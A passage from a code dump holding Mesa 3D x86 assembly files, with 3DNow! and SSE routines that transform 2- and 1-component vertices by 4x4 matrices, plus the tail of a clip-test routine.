MOV_B( REGIND(EBX), AL ) /* AL = running OR-mask */
MOV_B( REGIND(EBP), AH ) /* AH = running AND-mask */
JZ( LLBL(ctp4_np_finish) ) /* count == 0 */
ALIGNTEXT16
LLBL(ctp4_np_top):
MOV_L( SRC3, EBP )
MOV_L( SRC2, EBX )
XOR_L( ECX, ECX )
ADD_L( EBP, EBP ) /* ebp = abs(S(3))*2 ; carry = sign of S(3) */
ADC_L( ECX, ECX )
ADD_L( EBX, EBX ) /* ebx = abs(S(2))*2 ; carry = sign of S(2) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(2))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC1, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(1))*2 ; carry = sign of S(1) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(1))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC0, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(0))*2 ; carry = sign of S(0) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(0))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
#ifdef ELFPIC
MOV_L( REGIND(ESP), EBP ) /* clip_table */
MOV_B( REGBI(EBP, ECX), CL )
#else
MOV_B( REGOFF(clip_table,ECX), CL )
#endif
OR_B( CL, AL ) /* accumulate OR-mask */
AND_B( CL, AH ) /* accumulate AND-mask */
TEST_B( CL, CL )
MOV_B( CL, REGIND(EDX) ) /* store per-vertex clipmask */
INC_L( EDX )
/* slot */
ADD_L( ARG_DEST, ESI )
CMP_L( EDX, EDI )
JNZ( LLBL(ctp4_np_top) )
MOV_L( ARG_OR, ECX )
MOV_L( ARG_AND, EDX )
MOV_B( AL, REGIND(ECX) ) /* write back accumulated OR-mask */
MOV_B( AH, REGIND(EDX) ) /* write back accumulated AND-mask */
LLBL(ctp4_np_finish):
MOV_L( ARG_SOURCE, EAX )
#ifdef ELFPIC
POP_L( ESI ) /* discard ptr to clip_table */
#endif
POP_L( EBX )
POP_L( EBP )
POP_L( EDI )
POP_L( ESI )
RET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 15,849
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform2.S
|
/* $Id: 3dnow_xform2.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
/*
 * _mesa_3dnow_transform_points2_general
 *
 * 3DNow! transform of 2-component points by a full 4x4 matrix, emitting
 * 4-component results: r = x0*row0 + x1*row1 + row3 (the m30..m33 row
 * supplies the implicit-w translation terms since the source has no
 * z/w).  Dest vector: size 4, VEC_SIZE_4 flags.  Args via the ARG_*
 * macros (xform_args.h).  Loop regs: EAX src, EDX dst, EDI stride,
 * ESI count; MM0-MM5 hold the preloaded matrix columns/rows.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_general )
HIDDEN(_mesa_3dnow_transform_points2_general)
GLNAME( _mesa_3dnow_transform_points2_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_3 ) ) /* count == 0 -> skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVD ( REGOFF(8, ECX), MM2 ) /* | m02 */
PUNPCKLDQ ( REGOFF(24, ECX), MM2 ) /* m12 | m02 */
MOVD ( REGOFF(12, ECX), MM3 ) /* | m03 */
PUNPCKLDQ ( REGOFF(28, ECX), MM3 ) /* m13 | m03 */
MOVQ ( REGOFF(48, ECX), MM4 ) /* m31 | m30 */
MOVQ ( REGOFF(56, ECX), MM5 ) /* m33 | m32 */
ALIGNTEXT16
LLBL( G3TPGR_2 ):
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM0, MM6 ) /* x1*m10 | x0*m00 */
PFMUL ( MM1, MM7 ) /* x1*m11 | x0*m01 */
PFACC ( MM7, MM6 ) /* x0*m01+x1*m11 | x0*x00+x1*m10 */
PFADD ( MM4, MM6 ) /* x0*...*m11+m31 | x0*...*m10+m30 */
MOVQ ( MM6, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM2, MM6 ) /* x1*m12 | x0*m02 */
PFMUL ( MM3, MM7 ) /* x1*m13 | x0*m03 */
ADD_L ( EDI, EAX ) /* next vertex */
PFACC ( MM7, MM6 ) /* x0*m03+x1*m13 | x0*x02+x1*m12 */
PFADD ( MM5, MM6 ) /* x0*...*m13+m33 | x0*...*m12+m32 */
MOVQ ( MM6, REGOFF(8, EDX) ) /* write r3, r2 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_3 ):
FEMMS /* leave MMX/3DNow! state (fast EMMS) */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points2_perspective
 *
 * 3DNow! transform of 2-component points by a perspective matrix:
 * only m00/m11 scale the input; r2 is the constant m32 and r3 is 0
 * (MOVD zero-fills the high half of MM3).  Dest: size 4, VEC_SIZE_4
 * flags.  Args via the ARG_* macros (xform_args.h).
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_perspective )
HIDDEN(_mesa_3dnow_transform_points2_perspective)
GLNAME( _mesa_3dnow_transform_points2_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_3 ) ) /* count == 0 -> skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TPPR_2 ):
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( MM3, REGOFF(8, EDX) ) /* write r2 (=m32), r3 (=0) */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_3 ):
FEMMS /* leave MMX/3DNow! state (fast EMMS) */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points2_3d
 *
 * 3DNow! transform of 2-component points by the upper 3 columns of the
 * matrix plus translation: (r0,r1) = x0*(m00,m01) + x1*(m10,m11) +
 * (m30,m31); r2 = x0*m02 + x1*m12 + m32.  Only the low dword of the
 * final PFACC/PFADD result is stored (MOVD), so the "trash" high half
 * never reaches memory.  Dest: size 3, VEC_SIZE_3 flags.  Args via
 * the ARG_* macros (xform_args.h).
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_3d )
HIDDEN(_mesa_3dnow_transform_points2_3d)
GLNAME( _mesa_3dnow_transform_points2_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3 ), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_3 ) ) /* count == 0 -> skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVD ( REGOFF(8, ECX), MM2 ) /* | m02 */
PUNPCKLDQ ( REGOFF(24, ECX), MM2 ) /* m12 | m02 */
MOVQ ( REGOFF(48, ECX), MM4 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM5 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3R_2 ):
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM0, MM6 ) /* x1*m10 | x0*m00 */
PFMUL ( MM1, MM7 ) /* x1*m11 | x0*m01 */
PFACC ( MM7, MM6 ) /* x0*m01+x1*m11 | x0*x00+x1*m10 */
PFADD ( MM4, MM6 ) /* x0*...*m11+m31 | x0*...*m10+m30 */
MOVQ ( MM6, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM2, MM6 ) /* x1*m12 | x0*m02 */
PFACC ( MM7, MM6 ) /* ***trash*** | x0*x02+x1*m12 */
PFADD ( MM5, MM6 ) /* ***trash*** | x0*...*m12+m32 */
MOVD ( MM6, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_3 ):
FEMMS /* leave MMX/3DNow! state (fast EMMS) */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points2_3d_no_rot
 *
 * 3DNow! transform of 2-component points by a scale+translate matrix
 * (no rotation): (r0,r1) = (x0*m00+m30, x1*m11+m31); r2 is the
 * constant m32.  Dest: size 3, VEC_SIZE_3 flags.  Args via the ARG_*
 * macros (xform_args.h).
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points2_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points2_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3 ), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_3 ) ) /* count == 0 -> skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3NRR_2 ):
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFADD ( MM2, MM4 ) /* x1*m11+m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVD ( MM3, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_3 ):
FEMMS /* leave MMX/3DNow! state (fast EMMS) */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points2_2d
 *
 * 3DNow! transform of 2-component points by a 2x2 rotation/scale plus
 * translation: (r0,r1) = x0*(m00,m01) + x1*(m10,m11) + (m30,m31).
 * Dest: size 2, VEC_SIZE_2 flags.  Args via the ARG_* macros
 * (xform_args.h).
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_2d )
HIDDEN(_mesa_3dnow_transform_points2_2d)
GLNAME( _mesa_3dnow_transform_points2_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_3 ) ) /* count == 0 -> skip loop */
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVQ ( REGOFF(16, ECX), MM1 ) /* m11 | m10 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
MOVD ( REGOFF(4, EAX), MM5 ) /* | x1 */
PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PUNPCKLDQ ( MM5, MM5 ) /* x1 | x1 */
PFMUL ( MM1, MM5 ) /* x1*m11 | x1*m10 */
PFADD ( MM2, MM4 ) /* x...x1*m11+31 | x0*..*m10+m30 */
PFADD ( MM5, MM4 ) /* x0*m01+x1*m11 | x0*m00+x1*m10 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_3 ):
FEMMS /* leave MMX/3DNow! state (fast EMMS) */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points2_2d_no_rot
 *
 * 3DNow! transform of 2-component points by a scale+translate matrix
 * (no rotation): (r0,r1) = (x0*m00+m30, x1*m11+m31).  Dest: size 2,
 * VEC_SIZE_2 flags.  Args via the ARG_* macros (xform_args.h).
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points2_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points2_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_3 ) ) /* count == 0 -> skip loop */
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_2 ):
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFADD ( MM2, MM4 ) /* x1*m11+m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_3 ):
FEMMS /* leave MMX/3DNow! state (fast EMMS) */
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points2_identity
 *
 * Identity transform for 2-component points: each source (x1|x0) pair
 * is copied unchanged to the destination.  Dest: size 2, VEC_SIZE_2
 * flags.  Args via the ARG_* macros (xform_args.h).  Loop regs:
 * EAX = src ptr, EDX = dst ptr, EDI = src stride, ESI = remaining
 * count, MM0 = copy scratch.
 *
 * FIX: the count==0 guard previously jumped to LLBL(G3TPIR_3), which
 * is the loop HEAD, so an empty vector entered the copy loop; DEC then
 * wrapped ESI to -1 and JNZ spun through ~2^32 iterations writing
 * through EDX.  The guard now targets LLBL(G3TPIR_4) (the epilogue),
 * matching every other transform in this file.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_identity )
HIDDEN(_mesa_3dnow_transform_points2_identity)
GLNAME( _mesa_3dnow_transform_points2_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_4 ) ) /* count == 0 -> skip the copy loop entirely */
ALIGNTEXT16
LLBL( G3TPIR_3 ):
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
MOVQ ( MM0, REGIND(EDX) ) /* r1 | r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPIR_3 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_4 ):
FEMMS /* leave MMX/3DNow! state (fast EMMS) */
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,357
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform1.S
|
/* $Id: sse_xform1.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define M(i) REGOFF(i * 4, EDX)
/*
 * _mesa_sse_transform_points1_general
 *
 * SSE transform of 1-component points by a full 4x4 matrix:
 * r[0..3] = ox*M[0..3] + M[12..15].  Loop bound: ECX = dest start +
 * count*16, compared against the advancing dest pointer EDI.
 * Dest: size 4, VEC_SIZE_4 flags.  Source/dest fetched relative to
 * ESP (FRAME_OFFSET 8 after the two pushes); matrix via ARG_MATRIX.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_general)
HIDDEN( _mesa_sse_transform_points1_general )
GLNAME( _mesa_sse_transform_points1_general ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
CMP_L( CONST(0), ECX ) /* count == 0 ? */
JE( LLBL(K_GTP1GR_finish) ) /* yes -> nothing to do. */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( M(12), XMM1 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP1GR_top):
MOVSS( S(0), XMM2 ) /* ox */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM2 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
ADDPS( XMM1, XMM2 ) /* + | + | + | + */
MOVUPS( XMM2, D(0) ) /* unaligned store of all four results */
LLBL(K_GTP1GR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP1GR_top) )
LLBL(K_GTP1GR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points1_identity
 *
 * Identity transform for 1-component points: copies the single dword
 * x per vertex.  Skips the copy loop when source start == dest start
 * (in-place; copy would be a no-op).  Dest: size 1, VEC_SIZE_1 flags.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_identity)
HIDDEN(_mesa_sse_transform_points1_identity)
GLNAME( _mesa_sse_transform_points1_identity ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP1IR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_1), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(1), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
CMP_L( ESI, EDI ) /* src start == dst start ? */
JE( LLBL(K_GTP1IR_finish) ) /* yes -> in-place, nothing to copy */
ALIGNTEXT32
LLBL(K_GTP1IR_top):
MOV_L( S(0), EDX ) /* copy the single x component */
MOV_L( EDX, D(0) )
LLBL(K_GTP1IR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP1IR_top) )
LLBL(K_GTP1IR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points1_3d_no_rot
 *
 * SSE transform of 1-component points, scale+translate only:
 * D(0) = ox*m0 + m12; D(1) = m13 and D(2) = m14 are per-vertex
 * constants.  Dest: size 3, VEC_SIZE_3 flags.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_3d_no_rot)
HIDDEN(_mesa_sse_transform_points1_3d_no_rot)
GLNAME(_mesa_sse_transform_points1_3d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
